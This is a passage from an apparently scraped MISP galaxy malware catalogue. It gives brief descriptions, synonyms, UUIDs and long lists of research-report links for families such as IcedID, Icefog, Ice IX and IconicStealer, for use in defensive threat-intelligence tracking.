- https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/ - webarchive
- https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia - webarchive
- https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html - webarchive
- https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf - webarchive
- https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf - webarchive
- https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel - webarchive
- https://www.intrinsec.com/apt27-analysis/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10 - webarchive
- https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox - webarchive
- http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/ - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://securelist.com/luckymouse-hits-national-data-center/86083/ - webarchive
- https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/ - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ - webarchive
- https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html - webarchive
- https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/ - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HYPERSCRAPE
Internal MISP references
UUID d532739b-327c-4c15-b272-e37e89183f0f
which can be used as unique global reference for HYPERSCRAPE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HyperSSL (Windows)
Sideloader used by EmissaryPanda
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (Windows).
Known Synonyms |
---|
FOCUSFJORD |
Soldier |
Sysupdate |
Internal MISP references
UUID 84f43641-77bc-4dcb-a104-150e8574da22
which can be used as unique global reference for HyperSSL (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html - webarchive
- https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf - webarchive
- https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf - webarchive
- https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx - webarchive
- https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html - webarchive
- https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel - webarchive
- https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf - webarchive
- https://twitter.com/ESETresearch/status/1594937054303236096 - webarchive
- https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf - webarchive
- https://norfolkinfosec.com/emissary-panda-dll-backdoor/ - webarchive
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HZ RAT (Windows)
Internal MISP references
UUID eaaebc38-73d8-48b7-9927-2d2523870795
which can be used as unique global reference for HZ RAT (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Icarus
Icarus is modular stealer software written in .NET. One of its modules is the open source r77 rootkit.
Internal MISP references
UUID 8f1225ba-a636-488b-a288-ab777708a205
which can be used as unique global reference for Icarus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IcedID
According to Proofpoint, IcedID (aka BokBot) is malware originally classified as banking malware and first observed in 2017. It also acts as a loader for other malware, including ransomware. The well-known IcedID version consists of an initial loader that contacts a Loader C2 server and downloads the standard DLL Loader, which then delivers the standard IcedID Bot. IcedID is developed and operated by the actor named LUNAR SPIDER.
As previously published, historically there has been just one version of IcedID, which has remained constant since 2017.
- In November 2022, Proofpoint researchers observed the first new variant of IcedID, which Proofpoint dubbed 'IcedID Lite', distributed as a follow-on payload in a TA542 Emotet campaign. It was dropped by the Emotet malware soon after the actor returned to the e-crime landscape after a nearly four-month break.
- The IcedID Lite Loader observed in November 2022 contains a static URL to download a 'Bot Pack' file with a static name (botpack.dat), which results in the IcedID Lite DLL Loader and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.
- Starting in February 2023, Proofpoint observed the new Forked variant of IcedID. This variant was distributed by TA581 and one unattributed threat activity cluster, both acting as initial access facilitators. The campaigns used a variety of email attachments, such as Microsoft OneNote attachments and the comparatively rare .URL attachments, which led to the Forked variant of IcedID.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IcedID.
Known Synonyms |
---|
BokBot |
IceID |
Internal MISP references
UUID 26f5afaf-0bd7-4741-91ab-917bdd837330
which can be used as unique global reference for IcedID
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid - webarchive
- https://securityintelligence.com/x-force/spam-trends-campaigns-senior-superlatives-2023/ - webarchive
- https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/ - webarchive
- https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well - webarchive
- https://isc.sans.edu/diary/29740 - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot - webarchive
- https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.justice.gov/opa/pr/foreign-national-pleads-guilty-role-cybercrime-schemes-involving-tens-millions-dollars - webarchive
- https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/ - webarchive
- https://www.silentpush.com/blog/icedid-command-and-control-infrastructure - webarchive
- https://www.group-ib.com/blog/icedid - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice - webarchive
- https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites - webarchive
- https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html - webarchive
- https://nikpx.github.io/malware/analysis/2022/03/09/BokBot - webarchive
- https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - webarchive
- https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros - webarchive
- https://unit42.paloaltonetworks.com/atoms/monsterlibra/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
- https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/ - webarchive
- https://intel471.com/blog/malvertising-surges-to-distribute-malware - webarchive
- https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2 - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/ - webarchive
- https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/ - webarchive
- https://0x0d4y.blog/icedid-technical-analysis/ - webarchive
- https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/ - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/ - webarchive
- https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://twitter.com/felixw3000/status/1521816045769662468 - webarchive
- https://tccontre.blogspot.com/2021/01/ - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims - webarchive
- https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders - webarchive
- https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884 - webarchive
- https://www.youtube.com/watch?v=7Dk7NkIbVqY - webarchive
- https://www.silentpush.com/blog/malicious-infrastructure-as-a-service - webarchive
- https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html - webarchive
- https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid - webarchive
- https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/ - webarchive
- https://netresec.com/?b=214d7ff - webarchive
- https://eln0ty.github.io/malware%20analysis/IcedID/ - webarchive
- https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine - webarchive
- https://www.intrinsec.com/emotet-returns-and-deploys-loaders/ - webarchive
- https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html - webarchive
- https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html - webarchive
- https://www.youtube.com/watch?v=wObF9n2UIAM - webarchive
- https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/ - webarchive
- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/ - webarchive
- https://cert.gov.ua/article/39609 - webarchive
- https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/ - webarchive
- https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/ - webarchive
- https://unit42.paloaltonetworks.com/ta551-shathak-icedid/ - webarchive
- https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/ - webarchive
- https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f - webarchive
- https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/ - webarchive
- https://www.youtube.com/watch?v=wMXD4Sv1Alw - webarchive
- https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/ - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader - webarchive
- https://twitter.com/Unit42_Intel/status/1645851799427874818 - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://github.com/f0wl/deICEr - webarchive
- https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware - webarchive
- https://blog.reconinfosec.com/an-encounter-with-ta551-shathak - webarchive
- https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html - webarchive
- https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/ - webarchive
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution - webarchive
- https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766 - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive
- https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/ - webarchive
- https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240 - webarchive
- https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/ - webarchive
- https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - webarchive
- https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
- https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid - webarchive
- https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view - webarchive
- https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus - webarchive
- https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html - webarchive
- https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/ - webarchive
- https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan - webarchive
- https://isc.sans.edu/diary/rss/28934 - webarchive
- https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/ - webarchive
- https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary - webarchive
- https://isc.sans.edu/diary/28636 - webarchive
- https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917 - webarchive
- https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id - webarchive
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://blog.group-ib.com/prometheus-tds - webarchive
- https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf - webarchive
- https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ - webarchive
- https://forensicitguy.github.io/analyzing-icedid-document/ - webarchive
- https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/ - webarchive
- https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/ - webarchive
- https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html - webarchive
- https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html - webarchive
- https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1 - webarchive
- https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol - webarchive
- https://twitter.com/embee_research/status/1592067841154756610?s=20 - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/ - webarchive
- https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/ - webarchive
- https://malwation.com/icedid-malware-technical-analysis-report/ - webarchive
- https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise - webarchive
- https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/ - webarchive
- https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html - webarchive
- https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/ - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://blog.minerva-labs.com/icedid-maas - webarchive
- https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back - webarchive
- https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx - webarchive
- https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns - webarchive
- https://www.youtube.com/watch?v=YEqLIR6hfOM - webarchive
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/ - webarchive
- https://www.team-cymru.com/post/from-chile-with-malware - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/ - webarchive
- https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/ - webarchive
- https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7 - webarchive
- https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ - webarchive
- https://blog.techevo.uk/analysis/binary/2024/03/17/carving-the-icedid-part-3.html - webarchive
- https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03 - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion - webarchive
- https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ - webarchive
- https://www.binarydefense.com/icedid-gziploader-analysis/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://thedfirreport.com/2022/04/25/quantum-ransomware/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ironnet.com/blog/ransomware-graphic-blog - webarchive
- https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware - webarchive
- https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/ - webarchive
- https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/ - webarchive
- https://www.elastic.co/security-labs/unpacking-icedid - webarchive
- https://0x0d4y.blog/icedid-technical-analysis-of-x64-dll-version/ - webarchive
- https://ceriumnetworks.com/threat-of-the-month-icedid-malware/ - webarchive
- https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344 - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/ - webarchive
- https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic - webarchive
- https://www.youtube.com/watch?v=oZ4bwnjcXWg - webarchive
- https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/ - webarchive
- https://github.com/telekom-security/icedid_analysis - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/zeus-icedid-malware-gangs-leader-pleads-guilty-faces-40-years-in-prison/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem - webarchive
- https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection - webarchive
- https://github.com/0xThiebaut/PCAPeek/ - webarchive
- https://thedfirreport.com/2021/05/12/conti-ransomware/ - webarchive
- https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/ - webarchive
- https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
- https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IcedID Downloader
Internal MISP references
UUID c3be9189-f8f2-45e4-b6a3-8960fd5ffc16
which can be used as unique global reference for IcedID Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader - webarchive
- https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/ - webarchive
- http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/ - webarchive
- https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection - webarchive
- https://threatray.com/blog/a-new-icedid-gziploader-variant/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Icefog
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Icefog.
Known Synonyms |
---|
Fucobha |
Internal MISP references
UUID 48cdcbcf-38a8-4c68-a85e-42989ca28861
which can be used as unique global reference for Icefog
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog - webarchive
- https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
- http://www.kz-cert.kz/page/502 - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.icexloader
IceXLoader is commercial malware used to download and deploy additional malware on infected machines. The latest version is written in Nim, a relatively new language that threat actors have adopted over the past two years, most notably for the NimzaLoader variant of BazarLoader used by the TrickBot group.
Version 1 (v1) was written in AutoIt.
Internal MISP references
UUID eb1b3335-9002-49ad-b917-fcc188556d49
which can be used as unique global reference for win.icexloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IceCache
According to nao_sec, this malware is an IIS backdoor.
Internal MISP references
UUID d82b5e51-9785-40cd-b4f5-e47a6eb1bfaa
which can be used as unique global reference for IceCache
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IceEvent
According to nao_sec, this malware is a simple passive-mode backdoor that is installed as a service.
Internal MISP references
UUID d5037590-7753-401e-8572-b7797dece3bb
which can be used as unique global reference for IceEvent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ice IX
The ICE IX bot is a banking trojan derived from the Zeus botnet, as it reuses significant parts of Zeus's source code. ICE IX communicates over the HTTP protocol, so it can be considered a third-generation botnet. While it has been used for a variety of purposes, the primary threat from ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, executing it establishes a master-slave relationship between the botmaster and the compromised computer.
Internal MISP references
UUID 44a1706e-f6dc-43ea-ac85-9a4f2407b9a3
which can be used as unique global reference for Ice IX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix - webarchive
- https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus - webarchive
- https://securelist.com/ice-ix-not-cool-at-all/29111/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IconDown
Internal MISP references
UUID 4f7ae3da-948c-4f74-8229-d5d7461f9c7d
which can be used as unique global reference for IconDown
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IconicStealer
Follow-up payload in 3CX supply chain incident, which according to Volexity is an infostealer collecting information about the system and browser using an embedded copy of the SQLite3 library.
Internal MISP references
UUID 24fed92f-7e8f-449f-857f-d409d3bf8b48
which can be used as unique global reference for IconicStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise - webarchive
